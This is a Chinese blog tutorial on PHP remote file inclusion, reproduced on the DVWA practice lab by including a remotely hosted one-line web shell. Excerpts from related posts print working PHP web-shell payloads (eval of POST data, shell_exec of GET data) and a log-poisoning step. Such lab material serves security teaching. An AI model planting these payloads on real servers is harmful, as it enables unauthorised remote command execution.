文件上传漏洞之——远程文件包含漏洞(RFI)

最新推荐文章于 2024-08-05 17:02:59 发布
最新推荐文章于 2024-08-05 17:02:59 发布
阅读量4.6k 收藏 6
点赞数 4
分类专栏: 渗透测试(web渗透) 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wsnbbz/article/details/104651683
版权

定义
如果php.ini的配置选项allow_url_include为On的话,文件包含函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞。利用远程文件包含漏洞,可以直接执行任意命令
原理
同本地文件包含原理,只是参数可以换成一个远程的url地址,此时包含的文件不能为php文件,可写成txt或者图片马等等
文件包含的时候,无视文件格式,只要文件中有php代码,就会被执行
复现
dvwa low级别
1.在一个服务器下新建一个1.txt,写入一句话木马
在这里插入图片描述
2.访问此文件
在这里插入图片描述
3.通过菜刀连接getshell
在这里插入图片描述

卖N孩的X火柴
关注
专栏目录
Web渗透:文件包含漏洞
WolvenSec的博客
06-28 956
默认情况下,该选项是禁用的,以防止远程文件包含RFI漏洞。此时我们尝试将url中的文件路径改为hosts文件的绝对路径查看效果:可以看到与本地文件包含不同的是,这个时候我们使用绝对路径,文件的内同也可以被正常包含。如果magic_quotes_gpc是开启的则攻击无法成功,因为我们指定的带有木马的txt文件的url中带有反斜杠(被转义后的反斜杠就会被当成一个字符看待)。检查完成后,造成文件包含的关键代码:与本地文件包含的相关代码并无区别,都是接收客户端传来的文件路径(url)并进行包含。
远程文件包含漏洞
Ethan024的博客
04-08 762
什么是远程文件包含漏洞: 攻击者可以通过访问外部地址来加载远程代码。 实验环境: 皮卡丘靶场—File Inclusion(remote) (tips: 如果使用include和require,需在php.ini文件配置如下:allow_url_fopen = on //默认打开 allow_url_include = on //默认关闭) 实验步骤: 正常提交请求: 此时的url提交的内容为当前目标文件路径: http://localhost/pikaqiu.cn/vul/fileinclude/f
【网络安全】本地文件包含远程文件包含漏洞详解
最新发布
goldfish8848的博客
08-05 1104
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
文件包含漏洞详解
热门推荐
把梦想放飞在蓝色的天空里...
07-14 1万+
原文作者: m4r10 http://hi.baidu.com/m4r10 转载请注明版权 &&&远程文件包含漏洞&&& 一、 什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 涉及到的危险函数:include(),require()和incl
远程文件包含
Just for fun
10-20 2360
远程文件包含(Remote File Inclusion),简称RFI,与其对应的是本地文件包含(Local File Inclusion,LFI),它们都是通过PHP的包含函数即:require(),require_once(),include()和include_once()来使用。   一般情况下,用户通过包含函数将具有特定功能的函数或类包含到当前脚本中,是没有什么问题的。但是有时候,为...
Web安全领域的探索之远程文件包含漏洞(LFI)
Innocence_0的博客
01-18 1465
Web安全领域的探索之远程文件包含漏洞(LFI)
WEB漏洞——文件上传
qq_63594215的博客
04-09 1230
MIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类,当该扩展名文件被访问的时候,浏览器会自动使用知道应用程序来打开。多用于知道一些客户端自定义的文件名,以及一些媒体文件打开方式。网站允许上传任意文件,然后检查上传文件是否包含Webshell,如果包含删除文件。网站允许上传任意文件,但是如果不是指定类型,那么使用unlink删除文件。
服务器端文件包含,btslab全攻略——注入之远程文件包含&服务器端包含
05-22
远程文件包含(Remote File Inclusion,RFI)和服务器端文件包含(Server Side Include,SSI)是常见的Web应用程序漏洞,攻击者通过利用这些漏洞可以获取网站服务器上的敏感信息,甚至控制整个服务器。下面我来介绍...
文件包含漏洞-01】文件包含漏洞成因与其包含语句及其相关配置
cc
02-21 3042
tips:当服务器开启allow_url_include选项时,就可以通过php的某些特性函数[include(),require(),include_once(),require_once()]利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。,页面显示如下,可以看到在require语句界面,第一条require语句成功执行,但是第二条语句执行出错,显示警告,也出现报错致命错误,程序终止,导致后续 脚本无法执行!,网页显示如下,可以看到语句被成功执行!
文件包含漏洞(原理、挖掘与利用、DVWA 文件包含部分)
m0_61506558的博客
08-06 662
在bilibili里面底部的代码是不变的。包含内容包含页头、页脚包含函数 公共函数减少重复代码、便于维护1.2 问题可能会导致允许访问敏感文件或者执行恶意代 码,造成漏洞1.3 分类1.3.1 本地文件包含漏洞LFI目录遍历漏洞任意文件访问漏洞固定包含通过接口动态包含包含恶意代码或图片马包含敏感文件1.3.2 远程文件包含漏洞漏洞描述原因后果XXEXML外部实体注入使用XML参数数据,并且可以解析外部实体导致访问敏感文件、探测端口、执行系统命名SSRF。......
【基础篇】第05篇:PHP代码审计笔记--文件包含漏洞1
08-03
1. **远程文件包含(Remote File Inclusion, RFI)**:攻击者通过URL指定外部服务器上的文件来执行。 2. **本地文件包含(Local File Inclusion, LFI)**:攻击者通过修改程序中的文件路径来读取服务器上的敏感文件...
36、远程文件包含漏洞
weixin_41489908的博客
02-07 446
环境:DVWA,low级别 1、制作一句话图片,放到一台服务器上,该服务器ip:192.168.152.128 将yc.jpg照片拖入edjpgcom软件,添加下面这句话 <?fputs(fopen("1.php","w"),'<?php eval($_POST[cmd]);?>')?> 2、访问一下该图片:http://192.168.152.128/yc.jpg 3...
7-2远程文件包含漏洞案例讲解和演示
山兔的博客
05-31 2272
远程文件包含漏洞测试  远程文件包含漏洞测试 远程文件包含漏洞 远程文件包含漏洞形式跟本地文件包含漏洞差不多,都是我们的开发人员在后台使用包含函数的时候,没有对它包含的目的地,进行相关的安全措施,导致前端传进来的目标地址,被直接包含进去 在本地文件包含漏洞中,它传进来的,只能是本地的文件,它只能在本地去读取相关路径下的一些文件 在远程包含漏洞中,攻击者可以通过访问外部地址来加载远程的代码 但是在PHP配置里面,我们可以通过一些特殊的配置,允许这个包含函数,去通过一些协议,比如http、ftp这样的协议,去
远程执行文件包含
weixin_30347335的博客
01-08 281
<?php fputs(fopen("x.php","w"),"<?php @eval(\$_POST['x']);?>");?> 写入日志文件 chmod 777 /var/log/httpd nc xxx 80 <?php echo shell_exec($_GET['cmd']);?> cat /var/log/httpd...
远程文件包含原理及利用
G3et的博客
01-27 744
远程文件包含漏洞的危害在于,攻击者可以通过包含恶意文件来执行任意代码,从而获取服务器的权限、控制服务器或窃取服务器上的敏感信息。为了防范远程文件包含漏洞,应当使用严格的输入验证和过滤机制,确保只允许包含受信任的文件。我们来复现一下,首先准备一个phpinfo,假设把这个phpinfo放到我们自己的服务器,或者上传一个图片马放在任何可以上传的地方等等,只要能访问就行。由于没有对用户提交的文件名进行任何的安全限制,所以攻击者可以通过提交远程服务器上的文件 URL 来包含并执行远程文件。先来看看正常的一个情况。
文件包含漏洞远程文件包含
Xiongcanne的博客
04-25 991
所需服务器:kalilinux apache2 打开靶机删除原有的一句话木马 使用kali打开apache2 在kali其中html文件夹中创建一个txt文件 键入i输入创建一句话木马的代码 我们使用浏览器打开txt文件,可以看到含有该代码 文件包含该链接,使其执行其中代码 成功创建一句话木马 接着就用中国蚁剑连接就行了。 ...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值